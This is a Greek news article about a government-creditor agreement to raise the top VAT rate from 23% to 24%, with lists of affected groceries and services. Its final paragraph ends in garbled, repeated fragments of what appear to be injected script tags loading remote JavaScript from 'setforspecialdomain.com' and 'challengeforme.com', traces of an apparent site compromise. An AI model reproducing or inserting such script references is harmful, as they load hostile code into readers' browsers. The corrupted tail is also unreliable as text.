«Κλείδωσε» αύξηση στον υψηλό συντελεστή ΦΠΑ στο 24%

deite-se-poia-proionta-auksanetai-apo-aurio-o-fpa.w_l

Aύξηση του συντελεστή του ΦΠΑ από το 23% που είναι σήμερα στο 24% φαίνεται ότι συμφώνησαν κυβέρνηση και δανειστές κάτι που θα σημάνει την αύξηση, μικρή μεν, αλλά σε δεκάδες προϊόντα και υπηρεσίες πρώτης ανάγκης για όλους τους πολίτες.

Η συμφωνία με τους δανειστές, οι οποίοι πίεζαν ασφυκτικά για αύξηση του ΦΠΑ σε ρεύμα και νερό λέει για αύξηση του υψηλού συντελεστή του ΦΠΑ από την 1η Ιουλίου φέτος. Η κυβέρνηση, σύμφωνα με την εφημερίδα “Καθημερινή”, με την αύξηση αυτή επιχειρεί να κλείσει μεγάλο μέρος της τρύπας στο δημοσιονομικό κενό και μάλιστα υπολογίζει έσοδα της τάξης των 400 με 500 εκατομμυρίων ευρώ.

Η αύξηση του ΦΠΑ για  τους καταναλωτές δεν θα σημάνει παρά αυξήσεις σε δεκάδες προϊόντα και υπηρεσίες.

Ποια προϊόντα θα αυξηθούν άμεσα: Μακαρόνια Ρύζι Καφές Αλεύρι Μαρμελάδες Σοκολατες Παγωτά Φρυγανιές Αλλαντικά Αναψυκτικά Χυμοί και φυσικά όλα τα τυποποιημένα προϊόντα με συντελεστή 23% σήμερα.

Αυξήσεις θα υπάρξουν ταυτόχρονα θα υπάρξουν από την αύξηση του συντελεστή του ΦΠΑ σε εισιτήρια μέσων μεταφοράς, στην εστίαση, αλλά και στα ταξί.___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >